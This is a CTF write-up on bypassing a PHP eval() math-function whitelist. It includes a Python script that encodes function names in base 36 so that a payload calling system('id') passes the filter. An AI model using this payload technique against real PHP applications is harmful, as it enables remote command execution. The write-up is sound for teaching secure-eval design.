RCE with eval() + math functions in PHP
I solved this web challenge during BambooFox CTF 2021 as part of the CTF Team Mayas. The challenge was named calc.exe and we were given a URL: http://chall.ctf.bamboofox.tw:13377

Upon accessing the URL, a simple input field was shown. Checking the page source revealed a link to http://chall.ctf.bamboofox.tw:13377/?source , which showed the source code of the application:

```php
<?php
error_reporting(0);
isset($_GET['source']) && die(highlight_file(__FILE__));

function is_safe($query)
{
    $query = strtolower($query);
    preg_match_all("/([a-z_]+)/", $query, $words);
    $words = $words[0];
    $good = [
        'abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh',
        'base_convert', 'bindec', 'ceil', 'cos', 'cosh',
        ...
```
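The filter above only looks at runs of letters and underscores and checks each against a whitelist of math function names; digits, quotes, parentheses and everything else pass untouched. The model below (an added example, not code from the challenge or the writeup) reproduces that tokenising check in Python and shows why a name whitelist in front of eval() does not constrain what gets called: base_convert, which is on the visible part of the list, turns a decimal integer into a base-36 string, so any lowercase alphanumeric function name can be produced at runtime from digits alone. Only the whitelist entries visible on the page are used; the continuation of the list (the "...") is not assumed. The payload template assumes PHP 7 or later, where `(expr)(args)` calls the string returned by `expr` as a function.

```python
import re

# Whitelist exactly as far as it is visible in the challenge source; the real
# list continues, but nothing beyond these entries is assumed here.
GOOD = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh',
        'base_convert', 'bindec', 'ceil', 'cos', 'cosh']

# Digit alphabet PHP's base_convert() uses for bases up to 36.
DIGITS36 = "0123456789abcdefghijklmnopqrstuvwxyz"


def is_safe(query: str) -> bool:
    """Model of the challenge's is_safe(): lowercase the input, extract every
    [a-z_]+ run, and require each run to be a whitelisted name. Digits and
    punctuation are never inspected, which is the weakness demonstrated below."""
    words = re.findall(r"[a-z_]+", query.lower())
    return all(w in GOOD for w in words)


def php_base_convert(number: int, to_base: int) -> str:
    """PHP base_convert(number, 10, to_base) for a non-negative integer.
    PHP performs this on doubles, so values must stay below 2**53 to be exact;
    that bounds a base-36 name to 10 characters (36**10 < 2**53)."""
    if not 2 <= to_base <= 36:
        raise ValueError("base out of range")
    if number >= 2 ** 53:
        raise ValueError("PHP base_convert would lose precision above 2**53")
    if number == 0:
        return "0"
    digits = []
    while number:
        number, d = divmod(number, to_base)
        digits.append(DIGITS36[d])
    return "".join(reversed(digits))


def to_base36_int(name: str) -> int:
    """Inverse of base_convert(n, 10, 36): the integer whose base-36 rendering
    is `name`. Only [0-9a-z] can be produced this way; a leading '0' would be
    dropped by base_convert, so such names are rejected."""
    if not re.fullmatch(r"[1-9a-z][0-9a-z]*", name):
        raise ValueError("only lowercase alphanumerics without a leading 0 can be encoded")
    n = 0
    for ch in name:
        n = n * 36 + DIGITS36.index(ch)
    return n


def payload(func: str, arg: str) -> str:
    """Build a PHP expression of the form
    (base_convert(F,10,36))(base_convert(A,10,36)) that evaluates to func(arg)
    while containing no letters other than the whitelisted name base_convert.
    Constructed illustration: arg is limited to [0-9a-z]+ by this encoding."""
    f, a = to_base36_int(func), to_base36_int(arg)
    return f"(base_convert({f},10,36))(base_convert({a},10,36))"


if __name__ == "__main__":
    direct = "system('id')"
    print(direct, "->", "accepted" if is_safe(direct) else "rejected")
    p = payload("system", "id")
    print(p, "->", "accepted" if is_safe(p) else "rejected")
    # Round trip: the integers decode back to the intended strings.
    print(php_base_convert(to_base36_int("system"), 36),
          php_base_convert(to_base36_int("id"), 36))
```

Running it shows the direct call rejected (the tokens `system` and `id` are not whitelisted) while the base_convert form is accepted, because the only alphabetic token it contains is `base_convert`. The lesson for anyone writing a "safe eval" wrapper is that whitelisting identifiers is not the same as whitelisting behaviour: a function that can synthesise strings at runtime, combined with PHP's ability to call a string as a function, makes the token check irrelevant.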